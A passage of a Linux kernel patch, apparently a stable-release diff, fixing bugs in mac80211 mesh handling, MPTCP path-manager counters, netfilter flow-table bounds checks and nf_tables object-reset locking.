++		continue;
++
++free:
++		dev_kfree_skb(rx->skb);
+ 	}
+ 
+ 	return RX_QUEUED;
+@@ -2837,12 +3007,14 @@ ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx)
+ 			if (!rx->sdata->u.mgd.use_4addr)
+ 				return RX_DROP_UNUSABLE;
+ 			break;
++		case NL80211_IFTYPE_MESH_POINT:
++			break;
+ 		default:
+ 			return RX_DROP_UNUSABLE;
+ 		}
+ 	}
+ 
+-	if (is_multicast_ether_addr(hdr->addr1))
++	if (is_multicast_ether_addr(hdr->addr1) || !rx->sta)
+ 		return RX_DROP_UNUSABLE;
+ 
+ 	if (rx->key) {
+@@ -2865,152 +3037,6 @@ ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx)
+ 	return __ieee80211_rx_h_amsdu(rx, 0);
+ }
+ 
+-#ifdef CONFIG_MAC80211_MESH
+-static ieee80211_rx_result
+-ieee80211_rx_h_mesh_fwding(struct ieee80211_rx_data *rx)
+-{
+-	struct ieee80211_hdr *fwd_hdr, *hdr;
+-	struct ieee80211_tx_info *info;
+-	struct ieee80211s_hdr *mesh_hdr;
+-	struct sk_buff *skb = rx->skb, *fwd_skb;
+-	struct ieee80211_local *local = rx->local;
+-	struct ieee80211_sub_if_data *sdata = rx->sdata;
+-	struct ieee80211_if_mesh *ifmsh = &sdata->u.mesh;
+-	u16 ac, q, hdrlen;
+-	int tailroom = 0;
+-
+-	hdr = (struct ieee80211_hdr *) skb->data;
+-	hdrlen = ieee80211_hdrlen(hdr->frame_control);
+-
+-	/* make sure fixed part of mesh header is there, also checks skb len */
+-	if (!pskb_may_pull(rx->skb, hdrlen + 6))
+-		return RX_DROP_MONITOR;
+-
+-	mesh_hdr = (struct ieee80211s_hdr *) (skb->data + hdrlen);
+-
+-	/* make sure full mesh header is there, also checks skb len */
+-	if (!pskb_may_pull(rx->skb,
+-			   hdrlen + ieee80211_get_mesh_hdrlen(mesh_hdr)))
+-		return RX_DROP_MONITOR;
+-
+-	/* reload pointers */
+-	hdr = (struct ieee80211_hdr *) skb->data;
+-	mesh_hdr = (struct ieee80211s_hdr *) (skb->data + hdrlen);
+-
+-	if (ieee80211_drop_unencrypted(rx, hdr->frame_control))
+-		return RX_DROP_MONITOR;
+-
+-	/* frame is in RMC, don't forward */
+-	if (ieee80211_is_data(hdr->frame_control) &&
+-	    is_multicast_ether_addr(hdr->addr1) &&
+-	    mesh_rmc_check(rx->sdata, hdr->addr3, mesh_hdr))
+-		return RX_DROP_MONITOR;
+-
+-	if (!ieee80211_is_data(hdr->frame_control))
+-		return RX_CONTINUE;
+-
+-	if (!mesh_hdr->ttl)
+-		return RX_DROP_MONITOR;
+-
+-	if (mesh_hdr->flags & MESH_FLAGS_AE) {
+-		struct mesh_path *mppath;
+-		char *proxied_addr;
+-		char *mpp_addr;
+-
+-		if (is_multicast_ether_addr(hdr->addr1)) {
+-			mpp_addr = hdr->addr3;
+-			proxied_addr = mesh_hdr->eaddr1;
+-		} else if ((mesh_hdr->flags & MESH_FLAGS_AE) ==
+-			    MESH_FLAGS_AE_A5_A6) {
+-			/* has_a4 already checked in ieee80211_rx_mesh_check */
+-			mpp_addr = hdr->addr4;
+-			proxied_addr = mesh_hdr->eaddr2;
+-		} else {
+-			return RX_DROP_MONITOR;
+-		}
+-
+-		rcu_read_lock();
+-		mppath = mpp_path_lookup(sdata, proxied_addr);
+-		if (!mppath) {
+-			mpp_path_add(sdata, proxied_addr, mpp_addr);
+-		} else {
+-			spin_lock_bh(&mppath->state_lock);
+-			if (!ether_addr_equal(mppath->mpp, mpp_addr))
+-				memcpy(mppath->mpp, mpp_addr, ETH_ALEN);
+-			mppath->exp_time = jiffies;
+-			spin_unlock_bh(&mppath->state_lock);
+-		}
+-		rcu_read_unlock();
+-	}
+-
+-	/* Frame has reached destination.  Don't forward */
+-	if (!is_multicast_ether_addr(hdr->addr1) &&
+-	    ether_addr_equal(sdata->vif.addr, hdr->addr3))
+-		return RX_CONTINUE;
+-
+-	ac = ieee802_1d_to_ac[skb->priority];
+-	q = sdata->vif.hw_queue[ac];
+-	if (ieee80211_queue_stopped(&local->hw, q)) {
+-		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, dropped_frames_congestion);
+-		return RX_DROP_MONITOR;
+-	}
+-	skb_set_queue_mapping(skb, ac);
+-
+-	if (!--mesh_hdr->ttl) {
+-		if (!is_multicast_ether_addr(hdr->addr1))
+-			IEEE80211_IFSTA_MESH_CTR_INC(ifmsh,
+-						     dropped_frames_ttl);
+-		goto out;
+-	}
+-
+-	if (!ifmsh->mshcfg.dot11MeshForwarding)
+-		goto out;
+-
+-	if (sdata->crypto_tx_tailroom_needed_cnt)
+-		tailroom = IEEE80211_ENCRYPT_TAILROOM;
+-
+-	fwd_skb = skb_copy_expand(skb, local->tx_headroom +
+-				       IEEE80211_ENCRYPT_HEADROOM,
+-				  tailroom, GFP_ATOMIC);
+-	if (!fwd_skb)
+-		goto out;
+-
+-	fwd_skb->dev = sdata->dev;
+-	fwd_hdr =  (struct ieee80211_hdr *) fwd_skb->data;
+-	fwd_hdr->frame_control &= ~cpu_to_le16(IEEE80211_FCTL_RETRY);
+-	info = IEEE80211_SKB_CB(fwd_skb);
+-	memset(info, 0, sizeof(*info));
+-	info->control.flags |= IEEE80211_TX_INTCFL_NEED_TXPROCESSING;
+-	info->control.vif = &rx->sdata->vif;
+-	info->control.jiffies = jiffies;
+-	if (is_multicast_ether_addr(fwd_hdr->addr1)) {
+-		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_mcast);
+-		memcpy(fwd_hdr->addr2, sdata->vif.addr, ETH_ALEN);
+-		/* update power mode indication when forwarding */
+-		ieee80211_mps_set_frame_flags(sdata, NULL, fwd_hdr);
+-	} else if (!mesh_nexthop_lookup(sdata, fwd_skb)) {
+-		/* mesh power mode flags updated in mesh_nexthop_lookup */
+-		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_unicast);
+-	} else {
+-		/* unable to resolve next hop */
+-		mesh_path_error_tx(sdata, ifmsh->mshcfg.element_ttl,
+-				   fwd_hdr->addr3, 0,
+-				   WLAN_REASON_MESH_PATH_NOFORWARD,
+-				   fwd_hdr->addr2);
+-		IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, dropped_frames_no_route);
+-		kfree_skb(fwd_skb);
+-		return RX_DROP_MONITOR;
+-	}
+-
+-	IEEE80211_IFSTA_MESH_CTR_INC(ifmsh, fwded_frames);
+-	ieee80211_add_pending_skb(local, fwd_skb);
+- out:
+-	if (is_multicast_ether_addr(hdr->addr1))
+-		return RX_CONTINUE;
+-	return RX_DROP_MONITOR;
+-}
+-#endif
+-
+ static ieee80211_rx_result debug_noinline
+ ieee80211_rx_h_data(struct ieee80211_rx_data *rx)
+ {
+@@ -3019,6 +3045,7 @@ ieee80211_rx_h_data(struct ieee80211_rx_data *rx)
+ 	struct net_device *dev = sdata->dev;
+ 	struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)rx->skb->data;
+ 	__le16 fc = hdr->frame_control;
++	ieee80211_rx_result res;
+ 	bool port_control;
+ 	int err;
+ 
+@@ -3045,6 +3072,10 @@ ieee80211_rx_h_data(struct ieee80211_rx_data *rx)
+ 	if (unlikely(err))
+ 		return RX_DROP_UNUSABLE;
+ 
++	res = ieee80211_rx_mesh_data(rx->sdata, rx->sta, rx->skb);
++	if (res != RX_CONTINUE)
++		return res;
++
+ 	if (!ieee80211_frame_allowed(rx, fc))
+ 		return RX_DROP_MONITOR;
+ 
+@@ -4019,10 +4050,6 @@ static void ieee80211_rx_handlers(struct ieee80211_rx_data *rx,
+ 		CALL_RXH(ieee80211_rx_h_defragment);
+ 		CALL_RXH(ieee80211_rx_h_michael_mic_verify);
+ 		/* must be after MMIC verify so header is counted in MPDU mic */
+-#ifdef CONFIG_MAC80211_MESH
+-		if (ieee80211_vif_is_mesh(&rx->sdata->vif))
+-			CALL_RXH(ieee80211_rx_h_mesh_fwding);
+-#endif
+ 		CALL_RXH(ieee80211_rx_h_amsdu);
+ 		CALL_RXH(ieee80211_rx_h_data);
+ 
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index f388b39531748..dd1864f6549f2 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -594,6 +594,9 @@ __sta_info_alloc(struct ieee80211_sub_if_data *sdata,
+ 
+ 	sta->sta_state = IEEE80211_STA_NONE;
+ 
++	if (sdata->vif.type == NL80211_IFTYPE_MESH_POINT)
++		sta->amsdu_mesh_control = -1;
++
+ 	/* Mark TID as unreserved */
+ 	sta->reserved_tid = IEEE80211_TID_UNRESERVED;
+ 
+@@ -1269,6 +1272,20 @@ static void __sta_info_destroy_part2(struct sta_info *sta)
+ 	 *	 after _part1 and before _part2!
+ 	 */
+ 
++	/*
++	 * There's a potential race in _part1 where we set WLAN_STA_BLOCK_BA
++	 * but someone might have just gotten past a check, and not yet into
++	 * queuing the work/creating the data/etc.
++	 *
++	 * Do another round of destruction so that the worker is certainly
++	 * canceled before we later free the station.
++	 *
++	 * Since this is after synchronize_rcu()/synchronize_net() we're now
++	 * certain that nobody can actually hold a reference to the STA and
++	 * be calling e.g. ieee80211_start_tx_ba_session().
++	 */
++	ieee80211_sta_tear_down_BA_sessions(sta, AGG_STOP_DESTROY_STA);
++
+ 	might_sleep();
+ 	lockdep_assert_held(&local->sta_mtx);
+ 
+diff --git a/net/mac80211/sta_info.h b/net/mac80211/sta_info.h
+index 4809756a43dd1..09db542fd2021 100644
+--- a/net/mac80211/sta_info.h
++++ b/net/mac80211/sta_info.h
+@@ -621,6 +621,8 @@ struct link_sta_info {
+  *	taken from HT/VHT capabilities or VHT operating mode notification
+  * @cparams: CoDel parameters for this station.
+  * @reserved_tid: reserved TID (if any, otherwise IEEE80211_TID_UNRESERVED)
++ * @amsdu_mesh_control: track the mesh A-MSDU format used by the peer
++ *	(-1: not yet known, 0: non-standard [without mesh header], 1: standard)
+  * @fast_tx: TX fastpath information
+  * @fast_rx: RX fastpath information
+  * @tdls_chandef: a TDLS peer can have a wider chandef that is compatible to
+@@ -706,6 +708,7 @@ struct sta_info {
+ 	struct codel_params cparams;
+ 
+ 	u8 reserved_tid;
++	s8 amsdu_mesh_control;
+ 
+ 	struct cfg80211_chan_def tdls_chandef;
+ 
+diff --git a/net/mctp/test/route-test.c b/net/mctp/test/route-test.c
+index 92ea4158f7fc4..a944490a724d3 100644
+--- a/net/mctp/test/route-test.c
++++ b/net/mctp/test/route-test.c
+@@ -354,7 +354,7 @@ static void mctp_test_route_input_sk(struct kunit *test)
+ 
+ 		skb2 = skb_recv_datagram(sock->sk, MSG_DONTWAIT, &rc);
+ 		KUNIT_EXPECT_NOT_ERR_OR_NULL(test, skb2);
+-		KUNIT_EXPECT_EQ(test, skb->len, 1);
++		KUNIT_EXPECT_EQ(test, skb2->len, 1);
+ 
+ 		skb_free_datagram(sock->sk, skb2);
+ 
+diff --git a/net/mptcp/diag.c b/net/mptcp/diag.c
+index 7017dd60659dc..b2199cc282384 100644
+--- a/net/mptcp/diag.c
++++ b/net/mptcp/diag.c
+@@ -95,7 +95,7 @@ static size_t subflow_get_info_size(const struct sock *sk)
+ 		nla_total_size(4) +	/* MPTCP_SUBFLOW_ATTR_RELWRITE_SEQ */
+ 		nla_total_size_64bit(8) +	/* MPTCP_SUBFLOW_ATTR_MAP_SEQ */
+ 		nla_total_size(4) +	/* MPTCP_SUBFLOW_ATTR_MAP_SFSEQ */
+-		nla_total_size(2) +	/* MPTCP_SUBFLOW_ATTR_SSN_OFFSET */
++		nla_total_size(4) +	/* MPTCP_SUBFLOW_ATTR_SSN_OFFSET */
+ 		nla_total_size(2) +	/* MPTCP_SUBFLOW_ATTR_MAP_DATALEN */
+ 		nla_total_size(4) +	/* MPTCP_SUBFLOW_ATTR_FLAGS */
+ 		nla_total_size(1) +	/* MPTCP_SUBFLOW_ATTR_ID_REM */
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index 368886d3faac6..2bce3a32bd881 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -834,7 +834,7 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 			mptcp_close_ssk(sk, ssk, subflow);
+ 			spin_lock_bh(&msk->pm.lock);
+ 
+-			removed = true;
++			removed |= subflow->request_join;
+ 			if (rm_type == MPTCP_MIB_RMSUBFLOW)
+ 				__MPTCP_INC_STATS(sock_net(sk), rm_type);
+ 		}
+@@ -848,7 +848,11 @@ static void mptcp_pm_nl_rm_addr_or_subflow(struct mptcp_sock *msk,
+ 		if (!mptcp_pm_is_kernel(msk))
+ 			continue;
+ 
+-		if (rm_type == MPTCP_MIB_RMADDR) {
++		if (rm_type == MPTCP_MIB_RMADDR && rm_id &&
++		    !WARN_ON_ONCE(msk->pm.add_addr_accepted == 0)) {
++			/* Note: if the subflow has been closed before, this
++			 * add_addr_accepted counter will not be decremented.
++			 */
+ 			msk->pm.add_addr_accepted--;
+ 			WRITE_ONCE(msk->pm.accept_addr, true);
+ 		} else if (rm_type == MPTCP_MIB_RMSUBFLOW) {
+@@ -1474,7 +1478,10 @@ static bool mptcp_pm_remove_anno_addr(struct mptcp_sock *msk,
+ 	ret = remove_anno_list_by_saddr(msk, addr);
+ 	if (ret || force) {
+ 		spin_lock_bh(&msk->pm.lock);
+-		msk->pm.add_addr_signaled -= ret;
++		if (ret) {
++			__set_bit(addr->id, msk->pm.id_avail_bitmap);
++			msk->pm.add_addr_signaled--;
++		}
+ 		mptcp_pm_remove_addr(msk, &list);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
+@@ -1509,8 +1516,17 @@ static int mptcp_nl_remove_subflow_and_signal_addr(struct net *net,
+ 		remove_subflow = lookup_subflow_by_saddr(&msk->conn_list, addr);
+ 		mptcp_pm_remove_anno_addr(msk, addr, remove_subflow &&
+ 					  !(entry->flags & MPTCP_PM_ADDR_FLAG_IMPLICIT));
+-		if (remove_subflow)
++
++		if (remove_subflow) {
+ 			mptcp_pm_remove_subflow(msk, &list);
++		} else if (entry->flags & MPTCP_PM_ADDR_FLAG_SUBFLOW) {
++			/* If the subflow has been used, but now closed */
++			spin_lock_bh(&msk->pm.lock);
++			if (!__test_and_set_bit(entry->addr.id, msk->pm.id_avail_bitmap))
++				msk->pm.local_addr_used--;
++			spin_unlock_bh(&msk->pm.lock);
++		}
++
+ 		release_sock(sk);
+ 
+ next:
+@@ -1654,8 +1670,15 @@ void mptcp_pm_remove_addrs_and_subflows(struct mptcp_sock *msk,
+ 		mptcp_pm_remove_addr(msk, &alist);
+ 		spin_unlock_bh(&msk->pm.lock);
+ 	}
++
+ 	if (slist.nr)
+ 		mptcp_pm_remove_subflow(msk, &slist);
++
++	/* Reset counters: maybe some subflows have been removed before */
++	spin_lock_bh(&msk->pm.lock);
++	bitmap_fill(msk->pm.id_avail_bitmap, MPTCP_PM_MAX_ADDR_ID + 1);
++	msk->pm.local_addr_used = 0;
++	spin_unlock_bh(&msk->pm.lock);
+ }
+ 
+ static void mptcp_nl_remove_addrs_list(struct net *net,
+diff --git a/net/netfilter/nf_flow_table_inet.c b/net/netfilter/nf_flow_table_inet.c
+index 6eef15648b7b0..b0f1991719324 100644
+--- a/net/netfilter/nf_flow_table_inet.c
++++ b/net/netfilter/nf_flow_table_inet.c
+@@ -17,6 +17,9 @@ nf_flow_offload_inet_hook(void *priv, struct sk_buff *skb,
+ 
+ 	switch (skb->protocol) {
+ 	case htons(ETH_P_8021Q):
++		if (!pskb_may_pull(skb, skb_mac_offset(skb) + sizeof(*veth)))
++			return NF_ACCEPT;
++
+ 		veth = (struct vlan_ethhdr *)skb_mac_header(skb);
+ 		proto = veth->h_vlan_encapsulated_proto;
+ 		break;
+diff --git a/net/netfilter/nf_flow_table_ip.c b/net/netfilter/nf_flow_table_ip.c
+index 22bc0e3d8a0b5..34be2c9bc39d8 100644
+--- a/net/netfilter/nf_flow_table_ip.c
++++ b/net/netfilter/nf_flow_table_ip.c
+@@ -275,6 +275,9 @@ static bool nf_flow_skb_encap_protocol(struct sk_buff *skb, __be16 proto,
+ 
+ 	switch (skb->protocol) {
+ 	case htons(ETH_P_8021Q):
++		if (!pskb_may_pull(skb, skb_mac_offset(skb) + sizeof(*veth)))
++			return false;
++
+ 		veth = (struct vlan_ethhdr *)skb_mac_header(skb);
+ 		if (veth->h_vlan_encapsulated_proto == proto) {
+ 			*offset += VLAN_HLEN;
+diff --git a/net/netfilter/nf_flow_table_offload.c b/net/netfilter/nf_flow_table_offload.c
+index 1c26f03fc6617..1904a4f295d4a 100644
+--- a/net/netfilter/nf_flow_table_offload.c
++++ b/net/netfilter/nf_flow_table_offload.c
+@@ -841,8 +841,8 @@ static int nf_flow_offload_tuple(struct nf_flowtable *flowtable,
+ 				 struct list_head *block_cb_list)
+ {
+ 	struct flow_cls_offload cls_flow = {};
++	struct netlink_ext_ack extack = {};
+ 	struct flow_block_cb *block_cb;
+-	struct netlink_ext_ack extack;
+ 	__be16 proto = ETH_P_ALL;
+ 	int err, i = 0;
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 10180d280e792..63b7be0a95d04 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -7416,28 +7416,26 @@ static void audit_log_obj_reset(const struct nft_table *table,
+ 	kfree(buf);
+ }
+ 
+-struct nft_obj_filter {
++struct nft_obj_dump_ctx {
++	unsigned int	s_idx;
+ 	char		*table;
+ 	u32		type;
++	bool		reset;
+ };
+ 
+ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ {
+ 	const struct nfgenmsg *nfmsg = nlmsg_data(cb->nlh);
+-	const struct nft_table *table;
+-	unsigned int idx = 0, s_idx = cb->args[0];
+-	struct nft_obj_filter *filter = cb->data;
++	struct nft_obj_dump_ctx *ctx = (void *)cb->ctx;
+ 	struct net *net = sock_net(skb->sk);
+ 	int family = nfmsg->nfgen_family;
+ 	struct nftables_pernet *nft_net;
++	const struct nft_table *table;
+ 	unsigned int entries = 0;
+ 	struct nft_object *obj;
+-	bool reset = false;
++	unsigned int idx = 0;
+ 	int rc = 0;
+ 
+-	if (NFNL_MSG_TYPE(cb->nlh->nlmsg_type) == NFT_MSG_GETOBJ_RESET)
+-		reset = true;
+-
+ 	rcu_read_lock();
+ 	nft_net = nft_pernet(net);
+ 	cb->seq = READ_ONCE(nft_net->base_seq);
+@@ -7450,17 +7448,12 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 		list_for_each_entry_rcu(obj, &table->objects, list) {
+ 			if (!nft_is_active(net, obj))
+ 				goto cont;
+-			if (idx < s_idx)
++			if (idx < ctx->s_idx)
+ 				goto cont;
+-			if (idx > s_idx)
+-				memset(&cb->args[1], 0,
+-				       sizeof(cb->args) - sizeof(cb->args[0]));
+-			if (filter && filter->table &&
+-			    strcmp(filter->table, table->name))
++			if (ctx->table && strcmp(ctx->table, table->name))
+ 				goto cont;
+-			if (filter &&
+-			    filter->type != NFT_OBJECT_UNSPEC &&
+-			    obj->ops->type->type != filter->type)
++			if (ctx->type != NFT_OBJECT_UNSPEC &&
++			    obj->ops->type->type != ctx->type)
+ 				goto cont;
+ 
+ 			rc = nf_tables_fill_obj_info(skb, net,
+@@ -7469,7 +7462,7 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ 						     NFT_MSG_NEWOBJ,
+ 						     NLM_F_MULTI | NLM_F_APPEND,
+ 						     table->family, table,
+-						     obj, reset);
++						     obj, ctx->reset);
+ 			if (rc < 0)
+ 				break;
+ 
+@@ -7478,58 +7471,71 @@ static int nf_tables_dump_obj(struct sk_buff *skb, struct netlink_callback *cb)
+ cont:
+ 			idx++;
+ 		}
+-		if (reset && entries)
++		if (ctx->reset && entries)
+ 			audit_log_obj_reset(table, nft_net->base_seq, entries);
+ 		if (rc < 0)
+ 			break;
+ 	}
+ 	rcu_read_unlock();
+ 
+-	cb->args[0] = idx;
++	ctx->s_idx = idx;
+ 	return skb->len;
+ }
+ 
++static int nf_tables_dumpreset_obj(struct sk_buff *skb,
++				   struct netlink_callback *cb)
++{
++	struct nftables_pernet *nft_net = nft_pernet(sock_net(skb->sk));
++	int ret;
++
++	mutex_lock(&nft_net->commit_mutex);
++	ret = nf_tables_dump_obj(skb, cb);
++	mutex_unlock(&nft_net->commit_mutex);
++
++	return ret;
++}
++
+ static int nf_tables_dump_obj_start(struct netlink_callback *cb)
+ {
++	struct nft_obj_dump_ctx *ctx = (void *)cb->ctx;
+ 	const struct nlattr * const *nla = cb->data;
+-	struct nft_obj_filter *filter = NULL;
+-
+-	if (nla[NFTA_OBJ_TABLE] || nla[NFTA_OBJ_TYPE]) {
+-		filter = kzalloc(sizeof(*filter), GFP_ATOMIC);
+-		if (!filter)
+-			return -ENOMEM;
+ 
+-		if (nla[NFTA_OBJ_TABLE]) {
+-			filter->table = nla_strdup(nla[NFTA_OBJ_TABLE], GFP_ATOMIC);
+-			if (!filter->table) {
+-				kfree(filter);
+-				return -ENOMEM;
+-			}
+-		}
++	BUILD_BUG_ON(sizeof(*ctx) > sizeof(cb->ctx));
+ 
+-		if (nla[NFTA_OBJ_TYPE])
+-			filter->type = ntohl(nla_get_be32(nla[NFTA_OBJ_TYPE]));
++	if (nla[NFTA_OBJ_TABLE]) {
++		ctx->table = nla_strdup(nla[NFTA_OBJ_TABLE], GFP_ATOMIC);
++		if (!ctx->table)
++			return -ENOMEM;
+ 	}
+ 
+-	cb->data = filter;
++	if (nla[NFTA_OBJ_TYPE])
++		ctx->type = ntohl(nla_get_be32(nla[NFTA_OBJ_TYPE]));
++
+ 	return 0;
+ }
+ 
++static int nf_tables_dumpreset_obj_start(struct netlink_callback *cb)
++{
++	struct nft_obj_dump_ctx *ctx = (void *)cb->ctx;
++
++	ctx->reset = true;
++
++	return nf_tables_dump_obj_start(cb);
++}
++
+ static int nf_tables_dump_obj_done(struct netlink_callback *cb)
+ {
+-	struct nft_obj_filter *filter = cb->data;
++	struct nft_obj_dump_ctx *ctx = (void *)cb->ctx;
+ 
+-	if (filter) {
+-		kfree(filter->table);
+-		kfree(filter);
+-	}
++	kfree(ctx->table);
+ 
+ 	return 0;
+ }
+ 
+ /* called with rcu_read_lock held */
+-static int nf_tables_getobj(struct sk_buff *skb, const struct nfnl_info *info,
+-			    const struct nlattr * const nla[])
++static struct sk_buff *
++nf_tables_getobj_single(u32 portid, const struct nfnl_info *info,
++			const struct nlattr * const nla[], bool reset)
+ {
+ 	struct netlink_ext_ack *extack = info->extack;
+ 	u8 genmask = nft_genmask_cur(info->net);
+@@ -7538,72 +7544,109 @@ static int nf_tables_getobj(struct sk_buff *skb, const struct nfnl_info *info,
+ 	struct net *net = info->net;
+ 	struct nft_object *obj;
+ 	struct sk_buff *skb2;
+-	bool reset = false;
+ 	u32 objtype;
+ 	int err;
+ 
+-	if (info->nlh->nlmsg_flags & NLM_F_DUMP) {
+-		struct netlink_dump_control c = {
+-			.start = nf_tables_dump_obj_start,
+-			.dump = nf_tables_dump_obj,
+-			.done = nf_tables_dump_obj_done,
+-			.module = THIS_MODULE,
+-			.data = (void *)nla,
+-		};
+-
+-		return nft_netlink_dump_start_rcu(info->sk, skb, info->nlh, &c);
+-	}
+-
+ 	if (!nla[NFTA_OBJ_NAME] ||
+ 	    !nla[NFTA_OBJ_TYPE])
+-		return -EINVAL;
++		return ERR_PTR(-EINVAL);
+ 
+ 	table = nft_table_lookup(net, nla[NFTA_OBJ_TABLE], family, genmask, 0);
+ 	if (IS_ERR(table)) {
+ 		NL_SET_BAD_ATTR(extack, nla[NFTA_OBJ_TABLE]);
+-		return PTR_ERR(table);
++		return ERR_CAST(table);
+ 	}
+ 
+ 	objtype = ntohl(nla_get_be32(nla[NFTA_OBJ_TYPE]));
+ 	obj = nft_obj_lookup(net, table, nla[NFTA_OBJ_NAME], objtype, genmask);
+ 	if (IS_ERR(obj)) {
+ 		NL_SET_BAD_ATTR(extack, nla[NFTA_OBJ_NAME]);
+-		return PTR_ERR(obj);
++		return ERR_CAST(obj);
+ 	}
+ 
+ 	skb2 = alloc_skb(NLMSG_GOODSIZE, GFP_ATOMIC);
+ 	if (!skb2)
+-		return -ENOMEM;
++		return ERR_PTR(-ENOMEM);
+ 
+-	if (NFNL_MSG_TYPE(info->nlh->nlmsg_type) == NFT_MSG_GETOBJ_RESET)
+-		reset = true;
++	err = nf_tables_fill_obj_info(skb2, net, portid,
++				      info->nlh->nlmsg_seq, NFT_MSG_NEWOBJ, 0,
++				      family, table, obj, reset);
++	if (err < 0) {
++		kfree_skb(skb2);
++		return ERR_PTR(err);
++	}
+ 
+-	if (reset) {
+-		const struct nftables_pernet *nft_net;
+-		char *buf;
++	return skb2;
++}
+ 
+-		nft_net = nft_pernet(net);
+-		buf = kasprintf(GFP_ATOMIC, "%s:%u", table->name, nft_net->base_seq);
++static int nf_tables_getobj(struct sk_buff *skb, const struct nfnl_info *info,
++			    const struct nlattr * const nla[])
++{
++	u32 portid = NETLINK_CB(skb).portid;
++	struct sk_buff *skb2;
+ 
+-		audit_log_nfcfg(buf,
+-				family,
+-				1,
+-				AUDIT_NFT_OP_OBJ_RESET,
+-				GFP_ATOMIC);
+-		kfree(buf);
++	if (info->nlh->nlmsg_flags & NLM_F_DUMP) {
++		struct netlink_dump_control c = {
++			.start = nf_tables_dump_obj_start,
++			.dump = nf_tables_dump_obj,
++			.done = nf_tables_dump_obj_done,
++			.module = THIS_MODULE,
++			.data = (void *)nla,
++		};
++
++		return nft_netlink_dump_start_rcu(info->sk, skb, info->nlh, &c);
+ 	}
+ 
+-	err = nf_tables_fill_obj_info(skb2, net, NETLINK_CB(skb).portid,
+-				      info->nlh->nlmsg_seq, NFT_MSG_NEWOBJ, 0,
+-				      family, table, obj, reset);
+-	if (err < 0)
+-		goto err_fill_obj_info;
++	skb2 = nf_tables_getobj_single(portid, info, nla, false);
++	if (IS_ERR(skb2))
++		return PTR_ERR(skb2);
+ 
+-	return nfnetlink_unicast(skb2, net, NETLINK_CB(skb).portid);
++	return nfnetlink_unicast(skb2, info->net, portid);
++}
+ 
+-err_fill_obj_info:
+-	kfree_skb(skb2);
+-	return err;
++static int nf_tables_getobj_reset(struct sk_buff *skb,
++				  const struct nfnl_info *info,
++				  const struct nlattr * const nla[])
++{
++	struct nftables_pernet *nft_net = nft_pernet(info->net);
++	u32 portid = NETLINK_CB(skb).portid;
++	struct net *net = info->net;
++	struct sk_buff *skb2;
++	char *buf;
++
++	if (info->nlh->nlmsg_flags & NLM_F_DUMP) {
++		struct netlink_dump_control c = {
++			.start = nf_tables_dumpreset_obj_start,
++			.dump = nf_tables_dumpreset_obj,
++			.done = nf_tables_dump_obj_done,
++			.module = THIS_MODULE,
++			.data = (void *)nla,
++		};
++
++		return nft_netlink_dump_start_rcu(info->sk, skb, info->nlh, &c);
++	}
++
++	if (!try_module_get(THIS_MODULE))
++		return -EINVAL;
++	rcu_read_unlock();
++	mutex_lock(&nft_net->commit_mutex);
++	skb2 = nf_tables_getobj_single(portid, info, nla, true);
++	mutex_unlock(&nft_net->commit_mutex);
++	rcu_read_lock();
++	module_put(THIS_MODULE);
++
++	if (IS_ERR(skb2))
++		return PTR_ERR(skb2);
++
++	buf = kasprintf(GFP_ATOMIC, "%.*s:%u",
++			nla_len(nla[NFTA_OBJ_TABLE]),
++			(char *)nla_data(nla[NFTA_OBJ_TABLE]),
++			nft_net->base_seq);
++	audit_log_nfcfg(buf, info->nfmsg->nfgen_family, 1,
++			AUDIT_NFT_OP_OBJ_RESET, GFP_ATOMIC);
++	kfree(buf);
++
++	return nfnetlink_unicast(skb2, net, portid);
+ }
+ 
+ static void nft_obj_destroy(const struct nft_ctx *ctx, struct nft_object *obj)
+@@ -8810,7 +8853,7 @@ static const struct nfnl_callback nf_tables_cb[NFT_MSG_MAX] = {
+ 		.policy		= nft_obj_policy,
+ 	},
+ 	[NFT_MSG_GETOBJ_RESET] = {
+-		.call		= nf_tables_getobj,
++		.call		= nf_tables_getobj_reset,
+ 		.type		= NFNL_CB_RCU,
+ 		.attr_count	= NFTA_OBJ_MAX,
+ 		.policy		= nft_obj_policy,
+diff --git a/net/netfilter/nfnetlink_queue.c b/net/netfilter/nfnetlink_queue.c
+index 5bc342cb13767..f13eed826cbb8 100644
+--- a/net/netfilter/nfnetlink_queue.c
++++ b/net/netfilter/nfnetlink_queue.c
+@@ -647,10 +647,41 @@ static bool nf_ct_drop_unconfirmed(const struct nf_queue_entry *entry)
+ {
+ #if IS_ENABLED(CONFIG_NF_CONNTRACK)
+ 	static const unsigned long flags = IPS_CONFIRMED | IPS_DYING;
+-	const struct nf_conn *ct = (void *)skb_nfct(entry->skb);
++	struct nf_conn *ct = (void *)skb_nfct(entry->skb);
++	unsigned long status;
++	unsigned int use;
+ 
+-	if (ct && ((ct->status & flags) == IPS_DYING))
++	if (!ct)
++		return false;
++
++	status = READ_ONCE(ct->status);
++	if ((status & flags) == IPS_DYING)
+ 		return true;
++
++	if (status & IPS_CONFIRMED)
++		return false;
++
++	/* in some cases skb_clone() can occur after initial conntrack
++	 * pickup, but conntrack assumes exclusive skb->_nfct ownership for
++	 * unconfirmed entries.
++	 *
++	 * This happens for br_netfilter and with ip multicast routing.
++	 * We can't be solved with serialization here because one clone could
++	 * have been queued for local delivery.
++	 */
++	use = refcount_read(&ct->ct_general.use);
++	if (likely(use == 1))
++		return false;
++
++	/* Can't decrement further? Exclusive ownership. */
